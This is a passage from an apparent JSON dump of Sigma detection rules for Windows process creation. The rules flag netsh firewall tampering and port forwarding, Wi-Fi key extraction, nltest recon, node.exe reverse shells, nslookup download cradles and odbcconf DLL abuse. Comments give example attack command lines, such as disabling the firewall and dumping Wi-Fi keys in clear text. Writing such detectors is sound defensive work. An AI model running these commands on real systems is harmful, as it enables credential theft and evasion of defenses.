administration activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_delete_rule.yml",
    "content": "title: Firewall Rule Deleted Via Netsh.EXE\nid: 1a5fefe6-734f-452e-a07d-fc1c35bce4b2\nstatus: test\ndescription: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh\nreferences:\n    - https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/\nauthor: frack113\ndate: 2022-08-14\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'firewall'\n            - 'delete '\n    filter_optional_dropbox:\n        ParentImage|endswith: '\\Dropbox.exe'\n        CommandLine|contains: 'name=Dropbox'\n    filter_optional_avast:\n        ParentImage|endswith: '\\instup.exe'\n        CommandLine|contains: 'advfirewall firewall delete rule name=\"Avast Antivirus Admin Client\"'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate administration activity\n    - Software installations and removal\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_disable.yml",
    "content": "title: Firewall Disabled via Netsh.EXE\nid: 57c4bf16-227f-4394-8ec7-1b745ee061c3\nstatus: test\ndescription: Detects netsh commands that turn off the Windows firewall\nreferences:\n    - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\n    - https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall\nauthor: Fatih Sirin\ndate: 2019-11-01\nmodified: 2023-02-13\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\n    - attack.s0108\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli_1:\n        # Example: netsh firewall set opmode disable\n        CommandLine|contains|all:\n            - 'firewall'\n            - 'set'\n            - 'opmode'\n            - 'disable'\n    selection_cli_2:\n        # Example: netsh advfirewall set currentprofile state off\n        CommandLine|contains|all:\n            - 'advfirewall'\n            - 'set'\n            - 'state'\n            - 'off'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml",
    "content": "title: Netsh Allow Group Policy on Microsoft Defender Firewall\nid: 347906f3-e207-4d18-ae5b-a9403d6bcdef\nstatus: test\ndescription: Adversaries may modify system firewalls in order to bypass controls limiting network usage\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior\nauthor: frack113\ndate: 2022-01-09\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'advfirewall'\n            - 'firewall'\n            - 'set'\n            - 'rule'\n            - 'group='\n            - 'new'\n            - 'enable=Yes'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml",
    "content": "title: Firewall Configuration Discovery Via Netsh.EXE\nid: 0e4164da-94bc-450d-a7be-a4b176179f1f\nstatus: test\ndescription: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules\n    - https://ss64.com/nt/netsh.html\nauthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'\ndate: 2021-12-07\nmodified: 2025-10-18\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'netsh'\n            - 'show '\n            - 'firewall '\n        CommandLine|contains:\n            - 'config '\n            - 'state '\n            - 'rule '\n            - 'name=all'\n    condition: all of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml",
    "content": "title: Firewall Rule Update Via Netsh.EXE\nid: a70dcb37-3bee-453a-99df-d0c683151be6\nstatus: test\ndescription: Detects execution of netsh with the \"advfirewall\" and \"set\" options in order to set new values for properties of an existing rule\nreferences:\n    - https://ss64.com/nt/netsh.html\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            # Example 1: netsh advfirewall firewall set rule \"group=\\\"Network Discovery\\\" \" new enable=Yes\"\n            # Example 2: netsh advfirewall firewall set rule \"group=\\\"File and Printer Sharing\\\" \" new enable=Yes\"\n            - ' firewall '\n            - ' set '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\n    - Software installations and removal\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml",
    "content": "title: Potential Persistence Via Netsh Helper DLL\nid: 56321594-9087-49d9-bf10-524fe8479452\nrelated:\n    - id: c90362e0-2df3-4e61-94fe-b37615814cb1\n      type: similar\n    - id: e7b18879-676e-4a0e-ae18-27039185a8e7\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md\n    - https://github.com/outflanknl/NetshHelperBeacon\n    - https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/\nauthor: Victor Sergeev, oscd.community\ndate: 2019-10-25\nmodified: 2023-11-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.007\n    - attack.s0108\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'netsh.exe'\n        - Image|endswith: '\\netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'add'\n            - 'helper'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml",
    "content": "title: New Network Trace Capture Started Via Netsh.EXE\nid: d3c3861d-c504-4c77-ba55-224ba82d0118\nstatus: test\ndescription: Detects the execution of netsh with the \"trace\" flag in order to start a network capture\nreferences:\n    - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/\n    - https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/\nauthor: Kutepov Anton, oscd.community\ndate: 2019-10-24\nmodified: 2023-02-13\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'trace'\n            - 'start'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml",
    "content": "title: New Port Forwarding Rule Added Via Netsh.EXE\nid: 322ed9ec-fcab-4f67-9a34-e7c6aef43614\nstatus: test\ndescription: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\n    - https://adepts.of0x.cc/netsh-portproxy-code/\n    - https://www.dfirnotes.net/portproxy_detection/\nauthor: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel\ndate: 2019-01-29\nmodified: 2023-09-01\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'interface'\n            - 'portproxy'\n            - 'add'\n            - 'v4tov4'\n    selection_cli_2:\n        CommandLine|contains|all:\n            # Example: netsh I p a v l=8001 listena=127.0.0.1 connectp=80 c=192.168.1.1\n            - 'i ' # interface\n            - 'p ' # portproxy\n            - 'a ' # add\n            - 'v ' # v4tov4\n    selection_cli_3:\n        CommandLine|contains|all:\n            - 'connectp'\n            - 'listena'\n            - 'c='\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Legitimate administration activity\n    - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml",
    "content": "title: RDP Port Forwarding Rule Added Via Netsh.EXE\nid: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63\nstatus: test\ndescription: Detects the execution of netsh to configure a port forwarding (PortProxy) rule that involves port 3389 (RDP)\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html\nauthor: Florian Roth (Nextron Systems), oscd.community\ndate: 2019-01-29\nmodified: 2023-02-13\ntags:\n    - attack.lateral-movement\n    - attack.defense-evasion\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        # Note: short tokens on purpose, netsh accepts abbreviated keywords (interface -> i, portproxy -> p, connectport -> c)\n        CommandLine|contains|all:\n            - ' i'\n            - ' p'\n            - '=3389'\n            - ' c'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml",
    "content": "title: Harvesting Of Wifi Credentials Via Netsh.EXE\nid: 42b1a5b8-353f-4f10-b256-39de4467faff\nstatus: test\ndescription: Detects the harvesting of Wi-Fi credentials using netsh.exe\nreferences:\n    - https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/\nauthor: Andreas Hunkeler (@Karneades), oscd.community\ndate: 2020-04-20\nmodified: 2023-02-13\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1040\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\netsh.exe'\n        - OriginalFileName: 'netsh.exe'\n    selection_cli:\n        # Example: netsh wlan show profile name=<SSID> key=clear (abbreviated keywords are accepted, hence the short tokens)\n        CommandLine|contains|all:\n            - 'wlan'\n            - ' s'\n            - ' p'\n            - ' k'\n            - '=clear'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_nltest_execution.yml",
    "content": "title: Nltest.EXE Execution\nid: 903076ff-f442-475a-b667-4f246bcc203b\nrelated:\n    - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248\n      type: similar\n    - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1\n      type: obsolete\nstatus: test\ndescription: Detects nltest commands that can be used for information discovery\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm\nauthor: Arun Chauhan\ndate: 2023-02-03\ntags:\n    - attack.discovery\n    - attack.t1016\n    - attack.t1018\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\nltest.exe'\n        - OriginalFileName: 'nltestrk.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activity\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_nltest_recon.yml",
    "content": "title: Potential Recon Activity Via Nltest.EXE\nid: 5cc90652-4cbd-4241-aa3b-4b462fa5a248\nrelated:\n    - id: 410ad193-a728-4107-bc79-4419789fcbf8\n      type: similar\n    - id: 903076ff-f442-475a-b667-4f246bcc203b\n      type: similar\n    - id: 77815820-246c-47b8-9741-e0def3f57308\n      type: obsolete\nstatus: test\ndescription: Detects nltest commands that can be used for information discovery\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)\n    - https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\n    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n    - https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\n    - https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html\n    - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/\n    - https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest\nauthor: Craig Young, oscd.community, Georg Lauenstein\ndate: 2021-07-24\nmodified: 2023-12-15\ntags:\n    - attack.discovery\n    - attack.t1016\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_nltest:\n        - Image|endswith: '\\nltest.exe'\n        - OriginalFileName: 'nltestrk.exe'\n    selection_recon:\n        - CommandLine|contains|all:\n              - 'server'\n              - 'query'\n        - CommandLine|contains:\n              - '/user'\n              - 'all_trusts' # Flag for /domain_trusts\n              - 'dclist:'\n              - 'dnsgetdc:'\n              - 'domain_trusts'\n              - 'dsgetdc:'\n              - 'parentdomain'\n              - 'trusted_domains'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration use, but the user and host must be investigated\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_node_abuse.yml",
    "content": "title: Potential Arbitrary Code Execution Via Node.EXE\nid: 6640f31c-01ad-49b5-beb5-83498a5cd8bd\nstatus: test\ndescription: Detects the execution of node.exe, which is shipped with multiple software products such as VMware and Adobe, in order to execute arbitrary code, for example to establish a reverse shell as seen in Log4j attacks\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return\n    - https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/\n    - https://nodejs.org/api/cli.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\nmodified: 2023-02-03\ntags:\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_main:\n        Image|endswith: '\\node.exe'\n        CommandLine|contains:\n            - ' -e '\n            - ' --eval '\n    # Add more patterns of abuse as additional selection_action_* entries\n    selection_action_reverse_shell:\n        CommandLine|contains|all:\n            - '.exec('\n            - 'net.socket'\n            - '.connect'\n            - 'child_process'\n    condition: selection_main and 1 of selection_action_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml",
    "content": "title: Node Process Executions\nid: df1f26d3-bea7-4700-9ea2-ad3e990cf90e\nstatus: test\ndescription: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud\nreferences:\n    - https://twitter.com/mttaggart/status/1511804863293784064\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-04-06\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1127\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\Adobe Creative Cloud Experience\\libs\\node.exe'\n    filter:\n        CommandLine|contains: 'Adobe Creative Cloud Experience\\js' # Folder where Creative Cloud's JS resources are located\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_notepad_local_passwd_discovery.yml",
    "content": "title: Notepad Password Files Discovery\nid: 3b4e950b-a3ea-44d3-877e-432071990709\nstatus: experimental\ndescription: Detects the execution of Notepad to open a file whose name contains the string \"password\", which may indicate unauthorized access to credentials or suspicious activity.\nreferences:\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\n    - https://intel.thedfirreport.com/eventReports/view/57  # Private Report\nauthor: 'The DFIR Report'\ntags:\n    - attack.discovery\n    - attack.t1083\ndate: 2025-02-21\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\explorer.exe'\n        Image|endswith: '\\notepad.exe'\n        CommandLine|endswith:\n        # Note: the command line must end with a file name containing the string \"password\" and one of these extensions\n            - 'password*.txt'\n            - 'password*.csv'\n            - 'password*.doc'\n            - 'password*.xls'\n    condition: selection\nfalsepositives:\n    - Legitimate opening of files from remote hosts by administrators or users. However, storing passwords in a readable text format could be a violation of the organization's policy. Any match should be investigated further.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_nslookup_domain_discovery.yml",
    "content": "title: Network Reconnaissance Activity\nid: e6313acd-208c-44fc-a0ff-db85d572e90e\nstatus: test\ndescription: Detects a set of suspicious network related commands often used in recon stages\nreferences:\n    - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-07\ntags:\n    - attack.discovery\n    - attack.t1087\n    - attack.t1082\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'nslookup'\n            - '_ldap._tcp.dc._msdcs.'\n    condition: selection\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml",
    "content": "title: Nslookup PowerShell Download Cradle - ProcessCreation\nid: 1b3b01c7-84e9-4072-86e5-fc285a41ff23\nrelated:\n    - id: 72671447-4352-4413-bb91-b85569687135\n      type: obsolete\n    - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1\n      type: similar\nstatus: test\ndescription: Detects a suspicious PowerShell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS TXT records\nreferences:\n    - https://twitter.com/Alh4zr3d/status/1566489367232651264\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-05\nmodified: 2022-12-19\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\nslookup.exe'\n        - OriginalFileName: 'nslookup.exe' # the PE version-info field carries no path, a leading backslash here would never match\n    selection_cmd:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - ' -q=txt '\n            - ' -querytype=txt '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ntdsutil_susp_usage.yml",
    "content": "title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)\nid: a58353df-af43-4753-bad0-cd83ef35eef5\nrelated:\n    - id: 2afafd61-6aae-4df4-baed-139fa1f4c345\n      type: derived\nstatus: test\ndescription: Detects execution of ntdsutil.exe to perform actions such as mounting snapshots or activating the NTDS instance\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-14\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\ntdsutil.exe'\n        - OriginalFileName: 'ntdsutil.exe'\n    selection_cli:\n        - CommandLine|contains|all:\n              - 'snapshot'\n              - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot \"mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb\" quit quit\n        - CommandLine|contains|all:\n              # This offers more coverage to the \"selection_oneliner_1\" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08\n              # The shortest form of \"activate\" is \"ac\", but \"act\", \"acti\"...etc. are also valid forms\n              # Same case with the \"instance\" flag\n              - 'ac'\n              - ' i'\n              - ' ntds'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage to restore snapshots\n    - Legitimate admin activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml",
    "content": "title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)\nid: 2afafd61-6aae-4df4-baed-139fa1f4c345\nstatus: test\ndescription: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)\nreferences:\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm\nauthor: Thomas Patzke\ndate: 2019-01-16\nmodified: 2022-03-11\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ntdsutil.exe'\n    condition: selection\nfalsepositives:\n    - NTDS maintenance\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml",
    "content": "title: Driver/DLL Installation Via Odbcconf.EXE\nid: 3f5491e2-8db8-496b-9e95-1029fce852d4\nrelated:\n    - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729\n      type: similar\nstatus: test\ndescription: Detects execution of \"odbcconf\" with \"INSTALLDRIVER\" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: The \"/A\" flag is not required to call a specific action\n        CommandLine|contains|all:\n            - 'INSTALLDRIVER '\n            - '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate driver DLLs being registered via \"odbcconf\" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml",
    "content": "title: Suspicious Driver/DLL Installation Via Odbcconf.EXE\nid: cb0fe7c5-f3a3-484d-aa25-d350a7912729\nrelated:\n    - id: 3f5491e2-8db8-496b-9e95-1029fce852d4\n      type: derived\nstatus: test\ndescription: Detects execution of \"odbcconf\" with the \"INSTALLDRIVER\" action where the driver doesn't contain a \".dll\" extension. This is often used as a defense evasion method.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-23\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: The \"/A\" flag is not required to call a specific action\n        CommandLine|contains: 'INSTALLDRIVER '\n    filter_main_dll_ext:\n        CommandLine|contains: '.dll'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml",
    "content": "title: Odbcconf.EXE Suspicious DLL Location\nid: 6b65c28e-11f3-46cb-902a-68f2cafaf474\nstatus: test\ndescription: Detects execution of \"odbcconf\" where the DLL being registered is located in a potentially suspicious location.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\n    - https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\nmodified: 2023-05-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: Add more suspicious locations\n        CommandLine|contains:\n            - ':\\PerfLogs\\'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Registration\\CRMLog'\n            - ':\\Windows\\System32\\com\\dmp\\'\n            - ':\\Windows\\System32\\FxsTmp\\'\n            - ':\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\'\n            - ':\\Windows\\System32\\spool\\drivers\\color\\'\n            - ':\\Windows\\System32\\spool\\PRINTERS\\'\n            - ':\\Windows\\System32\\spool\\SERVERS\\'\n            - ':\\Windows\\System32\\Tasks_Migrated\\'\n            - ':\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - ':\\Windows\\SysWOW64\\com\\dmp\\'\n            - ':\\Windows\\SysWOW64\\FxsTmp\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Windows\\Tracing\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml",
    "content": "title: New DLL Registered Via Odbcconf.EXE\nid: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70\nrelated:\n    - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76\n      type: similar\nstatus: test\ndescription: Detects execution of \"odbcconf\" with \"REGSVR\" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16\n    - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/\n    - https://redcanary.com/blog/raspberry-robin/\n    - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\n    - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html\nauthor: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-22\ntags:\n    - attack.defense-evasion\n    - attack.t1218.008\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\odbcconf.exe'\n        - OriginalFileName: 'odbcconf.exe'\n    selection_cli:\n        # Note: The \"/A\" flag is not required to call a specific action\n        CommandLine|contains|all:\n            - 'REGSVR '\n            - '.dll'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate DLLs being registered via \"odbcconf\" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml",
